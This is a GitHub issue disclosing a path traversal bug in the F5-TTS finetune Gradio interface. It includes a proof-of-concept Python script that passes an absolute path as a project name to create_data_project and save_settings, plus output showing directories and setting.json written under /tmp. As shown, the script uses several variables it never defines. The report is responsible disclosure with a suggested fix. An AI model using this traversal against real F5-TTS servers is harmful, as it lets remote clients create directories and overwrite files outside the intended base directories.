### ISSUE TITLE
[Vulnerability]Path Traversal Leading to Arbitrary Directory Creation and Fixed-Name File Write Outside Intended Base Directory in SWivid/F5-TTS

### ISSUE THREAD

**Issue by AAtomical** [SWivid/F5-TTS#1293]
### Checks

- [x] This template is only for bug reports, usage problems go with 'Help Wanted'.
- [x] I have thoroughly reviewed the project documentation but couldn't find information to solve my problem.
- [x] I have searched for existing issues, including closed ones, and couldn't find a solution.
- [x] I am using English to submit this issue to facilitate community communication.

### Environment Details

OS: macOS 26.4.1 (Darwin 25.4.0, arm64) — bug is OS-agnostic; reproducible on any POSIX system that runs F5-TTS.
Python: 3.11.0
Software / dependencies:
f5-tts==1.1.20 (PyPI, latest at audit time — installed via uv pip install f5-tts==1.1.20)
gradio==6.10.0 (transitive — pinned by f5-tts)
gradio_client==2.4.0 (used as the attack client — real HTTP + WebSocket RPC, not an in-process call)
torch==2.11.0 (transitive; never invoked by the PoC, just imported by finetune_gradio at module load)

### Environment

| Component | Version |
|---|---|
| f5-tts (PyPI) | 1.1.20 (latest) |
| gradio (transitive) | as pinned by f5-tts |
| gradio_client | 1.x |
| Python | 3.11 |
| OS | macOS / Linux (any POSIX) |

### Imports 

```python
import gradio as gr
from gradio_client import Client
from f5_tts.train import finetune_gradio   # ← upstream module, installed via PyPI
```

The PoC asserts that the function objects bound to Gradio buttons are the EXACT upstream functions:

```python
assert finetune_gradio.create_data_project.__module__ == "f5_tts.train.finetune_gradio"
assert finetune_gradio.save_settings.__module__       == "f5_tts.train.finetune_gradio"
```

### Setup

```sh
uv venv --python 3.11 venv
source venv/bin/activate
uv pip install --index-strategy unsafe-best-match f5-tts==1.1.20 gradio_client

# F5-TTS computes path_data/path_project_ckpts via files("f5_tts").joinpath("../../{data,ckpts}")
# — those dirs must exist or get_list_projects() raises on import.
mkdir -p venv/lib/python3.11/data venv/lib/python3.11/ckpts
```

### Exploit Steps
poc.py
```python

from __future__ import annotations

import json
import os
import shutil
import sys
import threading
import time
from pathlib import Path

# REAL upstream import — installed via `pip install f5-tts==1.1.20`.
import gradio as gr
from gradio_client import Client
from f5_tts.train import finetune_gradio  # the vulnerable module
assert (
    finetune_gradio.create_data_project.__module__ == "f5_tts.train.finetune_gradio"
), "create_data_project must come from upstream module, not a local shim"
assert (
    finetune_gradio.save_settings.__module__ == "f5_tts.train.finetune_gradio"
), "save_settings must come from upstream module, not a local shim"


def build_app() -> gr.Blocks:
    with gr.Blocks() as app:
        project_name_in = gr.Textbox(label="Project Name", value="my_speak")
        cm_project = gr.Dropdown(
            choices=["my_speak_pinyin", "my_speak_char"],
            value="my_speak_pinyin",
            label="Project",
            allow_custom_value=True,
        )
        tokenizer_type = gr.Radio(choices=["pinyin", "char"], value="pinyin", label="Tokenizer")
        bt_create = gr.Button("Create a New Project")
        bt_save = gr.Button("Save Settings")
        out_create = gr.Textbox(label="create_data_project output", interactive=False)
        out_save = gr.Textbox(label="save_settings output", interactive=False)

        # --- Sink 1: create_data_project (line 611-614) ---
        bt_create.click(
            fn=finetune_gradio.create_data_project,
            inputs=[project_name_in, tokenizer_type],
            outputs=[cm_project],
            api_name="create_data_project",
        )

        # --- Sink 2: save_settings (line 61-110) ---
        # save_settings has 20 args; we provide harmless defaults for the
        # non-path ones. Only project_name (cm_project) is the attack vector.
        def call_save_settings(project_name: str, tokenizer_type: str):
            return finetune_gradio.save_settings(
                project_name,             # <-- ATTACKER CONTROLLED
                "TestExp",                # exp_name
                1e-5,                     # learning_rate
                3200,                     # batch_size_per_gpu
                "frame",                  # batch_size_type
                64,                       # max_samples
                1,                        # grad_accumulation_steps
                1.0,                      # max_grad_norm
                10,                       # epochs
                100,                      # num_warmup_updates
                100,                      # save_per_updates
                3,                        # keep_last_n_checkpoints
                10,                       # last_per_updates
                True,                     # finetune
                "",                       # file_checkpoint_train
                tokenizer_type,           # tokenizer_type
                "",                       # tokenizer_file
                "fp16",                   # mixed_precision
                "none",                   # logger
                False,                    # ch_8bit_adam
            )

        bt_save.click(
            fn=call_save_settings,
            inputs=[cm_project, tokenizer_type],
            outputs=[out_save],
            api_name="save_settings",
        )

    return app
PORT = 7861
app = build_app()
server_thread = threading.Thread(
    target=lambda: app.queue().launch(
        server_name="127.0.0.1",
        server_port=PORT,
        share=False,
        prevent_thread_lock=True,
        quiet=True,
    ),
    daemon=True,
)
print(f"[+] launching real Gradio server on 127.0.0.1:{PORT} ...")
server_thread.start()

# Wait for server readiness — poll the /info endpoint
import urllib.request
import urllib.error

deadline = time.time() + 30
ready = False
while time.time() < deadline:
    try:
        urllib.request.urlopen(f"http://127.0.0.1:{PORT}/", timeout=1)
        ready = True
        break
    except (urllib.error.URLError, ConnectionRefusedError):
        time.sleep(0.5)
if not ready:
    raise RuntimeError("Gradio server did not come up within 30s")
print("[+] server is up, connecting via gradio_client (real HTTP+WS RPC)")

client = Client(f"http://127.0.0.1:{PORT}/", verbose=False)
print("[+] connected via gradio_client")
print(f"\n[+] Attack 1: create_data_project name='{ATTACK_PROJECT_NAME}'")
result1 = client.predict(
    ATTACK_PROJECT_NAME,
    ATTACK_TOKENIZER,
    api_name="/create_data_project",
)
print(f"    handler returned: {result1!r}")

print(f"\n[+] Attack 2: save_settings cm_project='{ATTACK_PROJECT_NAME}_{ATTACK_TOKENIZER}'")
# save_settings receives cm_project verbatim (no concat, unlike create_data_project).
# So we pre-form the same name shape produced by attack 1.
result2 = client.predict(
    f"{ATTACK_PROJECT_NAME}_{ATTACK_TOKENIZER}",
    ATTACK_TOKENIZER,
    api_name="/save_settings",
)
print(f"    handler returned: {result2!r}")

# ────────────────────────────────────────────────────────────────────────────────
# Verify escape
# ────────────────────────────────────────────────────────────────────────────────

print("\n[+] verifying filesystem state ...")
escaped_artefacts = []

if expected_dataset_subdir.exists():
    escaped_artefacts.append(str(expected_dataset_subdir))
if expected_setting_file.exists():
    size = expected_setting_file.stat().st_size
    escaped_artefacts.append(f"{expected_setting_file} ({size} bytes)")
    print(f"    {expected_setting_file} content (first 200 chars):")
    print("    " + expected_setting_file.read_text()[:200].replace("\n", "\n    "))

if not escaped_artefacts:
    print("[FAIL] no escape — handler may have refused the input")
    sys.exit(1)

print("\n" + "=" * 72)
print("[!] ESCAPE CONFIRMED — file/dir written OUTSIDE both bases:")
print(f"     base_data           = {base_data}")
print(f"     base_project_ckpts  = {base_ckpts}")
for art in escaped_artefacts:
    art_path = Path(art.split(" (")[0])
    in_base = (
        str(art_path).startswith(str(base_data) + os.sep)
        or str(art_path).startswith(str(base_ckpts) + os.sep)
    )
    marker = "ESCAPE" if not in_base else "in-base"
    print(f"     [{marker}] {art}")
print("=" * 72)
print("\n[+] artefacts left in place at /tmp/F5TTS_PWND_pinyin/ for manual inspection")
print("    rm -rf /tmp/F5TTS_PWND_pinyin/   # to clean up")

```

<img width="1378" height="1286" alt="Image" src="https://github.com/user-attachments/assets/4a616d2a-a6b1-4e1d-950e-76fecc6aa3ec" />

### Filesystem Result (Path-Traversal Proof)

```
$ ls -la /tmp/F5TTS_PWND_pinyin/
drwxr-xr-x   sunyu  wheel    -    .
drwxrwxrwt   root   wheel    -    ..
drwxr-xr-x   sunyu  wheel    -    dataset/                        ← created by create_data_project
-rw-r--r--   sunyu  wheel  538    setting.json                    ← written by save_settings

$ cat /tmp/F5TTS_PWND_pinyin/setting.json
{
    "exp_name": "TestExp",
    "learning_rate": 1e-05,
    "batch_size_per_gpu": 3200,
    "batch_size_type": "frame",
    "max_samples": 64,
    "grad_accumulation_steps": 1,
    "max_grad_norm": 1.0,
    "epochs": 10,
    "num_warmup_updates": 100,
    "save_per_updates": 100,
    "keep_last_n_checkpoints": 3,
    "last_per_updates": 10,
    "finetune": true,
    "file_checkpoint_train": "",
    "tokenizer_type": "pinyin",
    "tokenizer_file": "",
    "mixed_precision": "fp16",
    "logger": "none",
    "bnb_optimizer": false
}
```

The base directories (where files SHOULD go) are:

```
.../venv/lib/python3.11/data         ← path_data
.../venv/lib/python3.11/ckpts        ← path_project_ckpts
```

Both files landed at `/tmp/F5TTS_PWND_pinyin/` — entirely outside both bases. **ESCAPE CONFIRMED**.

### ✔️ Expected Behavior

Project names supplied through the finetune Gradio UI should be treated as untrusted input and restricted to valid project identifiers only.

When creating a new data project or saving finetune settings, F5-TTS should ensure that the resolved project path remains inside the intended base directories, such as the configured data directory or checkpoint directory. Absolute paths, path traversal sequences, path separators, NULL bytes, or other filesystem-control characters should be rejected or normalized safely.

In particular:

- `create_data_project()` should only create project directories under the intended F5-TTS data directory.
- `save_settings()` should only write `setting.json` under the intended F5-TTS checkpoint/project directory.
- User-controlled project names should not be able to override the base path through `os.path.join()`.
- The application should perform a post-join containment check, such as resolving the path and verifying that it remains under the expected base directory.

### ❌ Actual Behavior

The finetune Gradio handlers accept attacker-controlled project names and pass them directly into `os.path.join()` without validating whether the resulting path remains inside the intended base directory.

Because Python's `os.path.join(base, user_input)` discards the base path when `user_input` is an absolute path, a project name such as `/tmp/F5TTS_PWND` causes F5-TTS to create directories and write files outside the intended F5-TTS data/checkpoint directories.

This allows any client that can reach the Gradio server to:

- create arbitrary directories at attacker-chosen filesystem locations writable by the server process;
- create a `dataset/` subdirectory at that location;
- write a fixed-name `setting.json` file outside the intended checkpoint/project directory;
- overwrite an existing `setting.json` file in any attacker-chosen writable directory.

For example, using `/tmp/F5TTS_PWND` as the project name causes the server to create `/tmp/F5TTS_PWND_pinyin/` and `/tmp/F5TTS_PWND_pinyin/dataset/`, then write `/tmp/F5TTS_PWND_pinyin/setting.json`, instead of writing under the intended F5-TTS data or checkpoint base directories.

This does not demonstrate direct code execution, because the final filename is fixed by the application. However, it does demonstrate a path traversal issue leading to arbitrary directory creation and fixed-name file write outside the intended base directory.
